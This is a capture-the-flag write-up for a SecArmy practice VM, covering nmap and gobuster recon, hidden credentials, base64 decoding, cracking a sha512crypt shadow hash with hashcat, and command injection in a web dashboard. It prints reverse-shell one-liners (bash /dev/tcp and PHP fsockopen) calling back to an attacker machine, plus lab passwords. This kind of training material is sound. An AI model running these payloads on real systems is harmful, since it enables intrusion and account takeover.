CTF-Writeups/SecarmyCTF/SecArmyOSCP.md
2020-10-30 12:41:28 -04:00


Sec Army CTF

Abdullah Rizwan | 29 October, 6:12 PM

NMAP

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-29 18:11 PKT
Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 18:11 (0:00:12 remaining)
Nmap scan report for 192.168.1.5
Host is up (0.00012s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.7
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 2c:54:d0:5a:ae:b3:4f:5b:f8:65:5d:13:c9:ee:86:75 (RSA)
|   256 0c:2b:3a:bd:80:86:f8:6c:2f:9e:ec:e4:7d:ad:83:bf (ECDSA)
|_  256 2b:4f:04:e0:e5:81:e4:4c:11:2f:92:2a:72:95:58:4e (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Totally Secure Website
MAC Address: 08:00:27:4D:91:E3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Challenge 1 (Uno)

By visiting the web page hosted on port 80 we are given task 1 to solve.

It says there might be a hidden directory, so let's brute-force directory names:

gobuster dir -u http://192.168.1.5:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 

Here we can see /anon, so let's visit that directory.

You won't see the text at first because it is hidden by setting the text colour to white, so it is important to select all text or view the page source.

These look like SSH credentials for the user, so let's try them.
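Hidden text like this never needs a browser: fetch the page and either strip the tags or pull out the elements that are styled invisible. The following is an added example, not part of the writeup. The HTML is constructed (the real /anon markup is not reproduced here, and the credential in it is a placeholder); the only real detail is the box address from the scan, and the trailing slash on /anon/ is an assumption.

```shell
#!/bin/sh
# Added example, not from the original writeup. Extracts text that a page hides
# with white-on-white styling. SAMPLE_HTML is constructed: the real /anon page is
# not shown in the writeup and the credential below is a placeholder.
SAMPLE_HTML='<html><body><h1>Totally Secure Website</h1>
<p style="color:#ffffff">uno:PLACEHOLDER_PASSWORD</p>
<p>Nothing to see here.</p></body></html>'

# Everything "select all" or view-source would reveal: tags removed, blank lines dropped.
strip_tags() {
  sed 's/<[^>]*>//g' | grep -v '^[[:space:]]*$'
}

# Only the text of elements styled invisible (color:white, #fff or #ffffff).
# Flat markup only: the text has to sit directly inside the styled element.
hidden_text() {
  grep -oiE '<[^>]*color: *(white|#fff(fff)?)[^>]*>[^<]*' | sed 's/^<[^>]*>//'
}

# Demo on the constructed page. Against the box it would be:
#   curl -s http://192.168.1.5/anon/ | hidden_text
printf '%s\n' "$SAMPLE_HTML" | hidden_text
```

The regex only catches the crude trick used here (an inline colour on the element holding the text); text hidden through a stylesheet class, `display:none` or a tiny font size will still show up in `strip_tags` output, which is why viewing the full source remains the reliable check.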

And we got in: a foothold!

We easily solved the challenge

But there is a readme.txt file which says

Challenge 2 (Dos)

The readme.txt file we have just read gives a password for the user dos. Let's check whether that user actually exists on this box:

root:x:0:0:root:/root:/bin/bash                                           
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin                                      
sys:x:3:3:sys:/dev:/usr/sbin/nologin                                      
sync:x:4:65534:sync:/bin:/bin/sync                                        
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
uno:x:1001:1001:,,,:/home/uno:/bin/bash
dos:x:1002:1002:,,,:/home/dos:/bin/bash
tres:x:1003:1003:,,,:/home/tres:/bin/bash
cuatro:x:1004:1004:,,,:/home/cuatro:/bin/bash
cinco:x:1005:1005:,,,:/home/cinco:/bin/bash
seis:x:1006:1006:,,,:/home/seis:/bin/bash
siete:x:1007:1007:,,,:/home/siete:/bin/bash
ocho:x:1008:1008:,,,:/home/ocho:/bin/bash
nueve:x:1009:1009:,,,:/home/nueve:/bin/bash
ftp:x:108:113:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
cero:x:1000:1000:,,,:/home/cero:/bin/bash

And apparently he does! So let's try switching user.

We successfully switched to dos:

dos@svos:~$ ls -la
total 180
drwx------  7 dos  dos    4096 Oct 19 19:46 .
drwxr-xr-x 12 root root   4096 Oct 19 11:05 ..
-rw-rw-r--  1 dos  dos      47 Oct  5 09:24 1337.txt
-rw-r--r--  1 dos  dos     220 Sep 22 11:36 .bash_logout
-rw-r--r--  1 dos  dos    3771 Sep 22 11:36 .bashrc
drwx------  2 dos  dos    4096 Sep 22 12:49 .cache
drwx------  2 dos  dos    4096 Sep 22 13:59 .elinks
drwxr-xr-x  2 dos  dos  135168 Sep 27 14:51 files
drwx------  3 dos  dos    4096 Sep 22 12:49 .gnupg
drwxrwxr-x  3 dos  dos    4096 Sep 22 13:24 .local
-rw-r--r--  1 dos  dos     807 Sep 22 11:36 .profile
-rw-rw-r--  1 dos  dos     104 Sep 23 09:52 readme.txt
dos@svos:~$ cat readme.txt 
You are required to find the following string inside the files folder:
a8211ac1853a1235d48829414626512a
dos@svos:~$ 

This says to find the string a8211ac1853a1235d48829414626512a (which looks like an MD5 hash) in the files folder, but the problem is that the folder holds 5001 text files.

To be honest I didn't know the command for searching for text inside files, so I just used Google.

That returned the result I wanted.

Now it's telling you to look at file3131.txt, which gives us

If you have done some CTFs the first thing that should come to mind is that this is base64-encoded text :D

Head over to CyberChef.

You might see something like challenge2/flag2.txt.

Next to the Output pane there is a magic-wand icon (CyberChef's Magic operation); click it and you'll get your second flag.
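Both steps, finding the one file among thousands that holds the string and decoding the base64 sitting in it, can be done from the shell. This is an added example, not part of the writeup: it builds a throwaway directory that stands in for ~dos/files (file names and contents are made up, and the base64 line is constructed so that it decodes to the path the writeup found), locates the file with grep, and decodes base64 lines with base64 -d. It also handles a trap that bites when you decode blindly: a 32-character hex hash is itself valid base64 and decodes to binary junk, so decodes that are not printable text are skipped.

```shell
#!/bin/sh
# Added example, not from the original writeup. Finds which of many files holds
# a known string and decodes base64 lines found in that file.
set -eu

# Build a constructed stand-in for ~dos/files: 40 junk files plus one that holds
# the needle followed by a base64 line (made up; the real files are not shown).
make_sample_tree() {
  dir=$(mktemp -d)
  for i in $(seq 1 40); do
    printf 'junk line %s\nnothing to see here\n' "$i" > "$dir/file$i.txt"
  done
  b64=$(printf '%s' 'challenge2/flag2.txt' | base64)
  printf '%s\n%s\n' 'a8211ac1853a1235d48829414626512a' "$b64" > "$dir/file31.txt"
  printf '%s\n' "$dir"
}

# grep -r recurses, -l prints only file names, -F takes the needle literally.
find_needle() {
  grep -rlF -- "$1" "$2"
}

# Decode every base64-shaped line in a file, keeping only decodes that are
# printable text. A 32-char hex hash is itself valid base64 and would otherwise
# produce binary junk.
decode_b64_lines() {
  grep -E '^[A-Za-z0-9+/]+={0,2}$' "$1" | while IFS= read -r line; do
    decoded=$(printf '%s' "$line" | base64 -d 2>/dev/null) || continue
    if [ -n "$(printf '%s' "$decoded" | LC_ALL=C tr -d '[:print:][:space:]')" ]; then
      continue   # binary result: not the text we are after
    fi
    printf '%s\n' "$decoded"
  done
}

dir=$(make_sample_tree)
hit=$(find_needle a8211ac1853a1235d48829414626512a "$dir")
printf 'needle found in: %s\n' "$hit"
decode_b64_lines "$hit"
rm -rf "$dir"
```

On the box the same two calls are `find_needle a8211ac1853a1235d48829414626512a ~/files` followed by `decode_b64_lines` on the file it names; `grep -rn` instead of `-l` also shows the surrounding line when you want context.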

We can also see this text from todo.txt:

Although its total WASTE but... here's your super secret token: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b

Challenge 3 (Tres)

In dos's home directory we can also see a hint:

dos@svos:~$ cat 1337.txt 
Our netcat application is too 1337 to handle..

This refers to port 1337 on the box. Note that the nmap scan above only covered the default top 1000 ports and did not list 1337, so a full scan (-p-) or a direct connection is needed to confirm it is open.

I tried looking for a parameter (?p=1, ?secret=2, ?token=3, ?waste=3), but since this isn't a PHP page these won't work.

Then I focused on the hint that the netcat application is too 1337 to handle. I quickly visited Google for answers:

https://unix.stackexchange.com/questions/332163/netcat-send-text-to-echo-service-read-reply-then-exit

I did find something:

echo the token and pipe it into netcat, giving the box's IP and port 1337 as arguments.

Challenge 4 (Cuatro)

Now we are in as tres, so let's start exploring his home directory.

We are presented with a binary exploitation (buffer overflow) challenge: there is a binary called secarmy-village, but running it gives us an error.

I couldn't figure out what I was supposed to fix in this binary; I had an idea to do something with Ghidra, but I failed to do it.

Challenge 5 (Cinco)

/var/www/html is where the web pages are hosted; looking there we find the directories and pages being served.

The anon directory is the one we found through gobuster, so we know these are what is served on port 80. Let's try justanothergallery.

It has an index.php page and a qr subdirectory that contains a lot of QR code images for us to scan.

We can scan these QR codes with any QR reader app from the Play Store or wherever you prefer.

Scanning the QR codes gives the following text:

image-0 Hello
image-1 and
image-2 congrats
image-3 for
image-4 solving
image-5 this
image-6 challenge,
image-7 we
image-8 hope
image-9 that
image-10 you
image-11 enojoyed
image-12 the
image-13 challenges
image-14 we
image-15 presented
image-16 so
image-17 far.
image-18 It
image-19 is
image-20 time
image-21 for
image-22 us
image-23 to
image-24 increase
image-25 the
image-26 difficulty
image-27 level
image-28 and
image-29 make
image-30 the
image-31 upcoming
image-32 challenges
image-33 more
image-34 challenging
image-35 than
image-36 previous
image-37 ones.
image-38 Before
image-39 you
image-40 move
image-41 to
image-42 the
image-43 next
image-44 challenge,
image-45 here
image-46 are
image-47 the
image-48 credentials
image-49 for
image-50 the
image-51 5th
image-52 user
image-53 cinco:ruy70m35
image-54 head
image-55 over
image-56 to
image-57 this
image-58 user
image-59 and
image-60 get
image-61 your
image-62 5th
image-63 flag!
image-64 goodluck

Ahhhh, so I scanned the 65 QR images (image-0 to image-64) with my phone and got the credentials cinco:ruy70m35.

Now the readme.txt says:
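Scanning 65 images by phone works, but it is slow and easy to get out of order. The following is an added example, not from the writeup, that decodes a directory of QR images from the command line. It assumes the zbarimg tool (Debian/Ubuntu package zbar-tools) is installed and that the files are named image-N.png; the writeup only shows the image-N prefix, so the extension is an assumption. The ordering helper matters because a plain glob or ls lists image-10 before image-2 and would scramble the sentence.

```shell
#!/bin/sh
# Added example, not from the original writeup: decode a directory of QR images
# in numeric order and join the words. Assumes zbarimg (zbar-tools) is installed
# and that files are named image-N.png (the extension is assumed).
set -eu

# Order names by their numeric suffix. Plain glob/ls order is lexical
# (image-1, image-10, image-11, ..., image-2), which would scramble the sentence.
numeric_order() { printf '%s\n' "$@" | sort -V; }

# Decode each image in numeric order and join the words into one line.
decode_qr_dir() {
  dir=$1
  numeric_order "$dir"/image-*.png | while IFS= read -r f; do
    zbarimg -q --raw "$f" 2>/dev/null | tr -d '\n'   # one word per image
    printf ' '
  done | sed 's/ $//'
  printf '\n'
}

# Demo of the ordering on constructed names; against a copy of the gallery:
#   decode_qr_dir ./justanothergallery/qr
numeric_order image-10.png image-2.png image-1.png
```

The same approach lets you confirm each image decodes to exactly one word; an image that decodes to nothing (zbarimg returns non-zero) shows up as a gap in the output rather than silently shifting the credential.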

cinco@svos:~$ cat readme.txt 
Check for Cinco's secret place somewhere outside the house
cinco@svos:~$ 

By "outside the house" it means look outside the ~ (home) directory.

Here we find cincos-secrets.

This is all we get in cincos-secrets:

We know that shadow.bak, a backup of the original shadow file, belongs to cinco, so we can change its permissions since we own it.

It doesn't matter which permissions you give, but in a real scenario grant only what the owner needs. Reading the file only requires the read bit for the owner, so either of these works:

chmod u+rwx shadow.bak (or just chmod u+r shadow.bak, depending on what you need to do with the file), or

chmod 700 shadow.bak

On reading the file we see a hash:

seis:$6$MCzqLn0Z2KB3X3TM$opQCwc/JkRGzfOg/WTve8X/zSQLwVf98I.RisZCFo0mTQzpvc5zqm/0OJ5k.PITcFJBnsn7Nu2qeFP8zkBwx7.:18532:0:99999:7:::

We already know from the hint that we need to use rockyou.txt.

Copy the whole hash line into a file (a .txt extension is not needed). Now you can use either John the Ripper or hashcat; for me John the Ripper was taking too long, so I used hashcat (although it sometimes doesn't work on Windows, it did work here :D).

The $6$ prefix identifies the hash as sha512crypt, which is hashcat mode 1800:

hashcat -a 0 -m 1800 -o cracked.txt hash /usr/share/wordlists/rockyou.txt

Challenge 6 (Seis)

I didn't solve this one in order xD

Challenge 7 (Siete)

Visiting /var/www/html we will see shellcmsdashboard, so let's hop over to that directory.

Back in the browser, there is a robots.txt, and reading it gives us a password.

On giving the right credentials, it points us to the next page.

What we have here is a command injection (RCE): whatever command we enter is executed on the server for us.

We have already seen a readme9213.txt in that directory, and since the web shell runs as www-data and the file belongs to www-data, we should be able to read it.

But running cat readme9213.txt through the web page won't give us the result, so we get a reverse shell in order to work with the file.

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

bash -i >& /dev/tcp/192.168.1.7/4444 0>&1 - This didn't work.

php -r '$sock=fsockopen("192.168.1.7",4444);exec("/bin/sh -i <&3 >&3 2>&3");' - This did.

The bash one-liner fails here because the injected command runs under /bin/sh (dash on Ubuntu), which has neither the >& redirection nor /dev/tcp; wrapping it as bash -c '...' is the usual workaround.

We cannot read the file because its permissions are write and execute only (--wx-wx-wx), but since it belongs to us we can simply make it readable.

/var/www/html/shellcmsdashboard
$ cat readme9213.txt
cat: readme9213.txt: Permission denied
$ ls -la
total 24
drwxrwxrwx 2 root     root 4096 Oct 18 15:02 .
drwxr-xr-x 5 root     root 4096 Oct  8 17:51 ..
-rwxrwxrwx 1 root     root 1459 Oct  1 17:57 aabbzzee.php
-rwxrwxrwx 1 root     root 1546 Oct 18 15:02 index.php
--wx-wx-wx 1 www-data root   48 Oct  8 17:54 readme9213.txt
-rwxrwxrwx 1 root     root   58 Oct  1 17:37 robots.txt
$ chmod u=rwx readme9213.txt
$ cat readme9213.txt
password for the seventh user is 6u1l3rm0p3n473
$ 
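The reason cat fails and chmod then succeeds, here and on shadow.bak in Challenge 5, is that mode bits restrict what the owner can read or write but never whether the owner may change the mode itself. The following is an added example, not part of the writeup, that reproduces the situation on a temporary file with the same 0333 mode readme9213.txt had (the file content is constructed) and applies the least-privilege fix. One caveat a practitioner should know: root bypasses read permission entirely, so the "before" read only fails for an unprivileged user.

```shell
#!/bin/sh
# Added example, not from the original writeup. Shows why `cat` fails on a
# --wx-wx-wx file and why the owner can still read it after chmod: mode bits
# never stop the owner from changing the mode. The file content is constructed.
set -eu

# Create a file with the mode readme9213.txt had (0333 = --wx-wx-wx).
make_writeonly_file() {
  f=$(mktemp)
  printf 'constructed secret line\n' > "$f"
  chmod 0333 "$f"
  printf '%s\n' "$f"
}

# Octal mode as the kernel sees it (GNU stat).
mode_of() { stat -c %a "$1"; }

# 0 if the calling user can read the file, 1 if not. Root bypasses the read
# check entirely, so as root this returns 0 even for mode 0333.
can_read() { cat "$1" >/dev/null 2>&1; }

# Least-privilege fix: add read for the owner only. `chmod u=rwx` (as in the
# shell session above) also works but grants more than needed.
add_owner_read() { chmod u+r "$1"; }

f=$(make_writeonly_file)
printf 'mode before: %s\n' "$(mode_of "$f")"
can_read "$f" && echo "readable anyway (running as root?)" || echo "cat: Permission denied"
add_owner_read "$f"
printf 'mode after:  %s\n' "$(mode_of "$f")"
cat "$f"
rm -f "$f"
```

Note from the listing above that the shellcmsdashboard directory itself is world-writable (drwxrwxrwx), so ownership of readme9213.txt would not have been needed anyway: any local user could rename or replace the file, which is the bigger weakness in that directory.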

A hint is given which tells us that the message is decimal text.

On decoding the message from decimal we get

I wasn't able to solve this challenge, so I couldn't proceed any further.
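For the decimal step above, the conversion is just each number taken as a byte value. This is an added example, not from the writeup; the challenge's actual message is not reproduced here, so the input shown is constructed. It rejects anything that is not a byte, including numbers with leading zeros, which printf would otherwise parse as octal.

```shell
#!/bin/sh
# Added example, not from the original writeup: turn a list of decimal byte
# values into text. The sample input is constructed; the challenge's real
# message is not shown in the writeup.
decode_decimal() {
  # accept spaces or commas as separators
  for n in $(printf '%s' "$1" | tr ',' ' '); do
    # reject empty tokens, non-digits, and leading zeros (printf would read 0115 as octal)
    case $n in ''|*[!0-9]*|0?*) return 1 ;; esac
    [ "$n" -le 255 ] || return 1               # not a byte
    printf "\\$(printf '%03o' "$n")"           # emit the byte via an octal escape
  done
  printf '\n'
}

decode_decimal '115 105 101 116 101'   # constructed input, spells "siete"
```

A message that decodes to unreadable bytes is a sign the numbers were not plain ASCII codes (a different base, an offset, or a second layer of encoding) rather than a bug in the decoder.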

End

So I didn't get to see what the remaining challenges looked like. Although it was easy, I didn't have that much exposure to CTF competitions.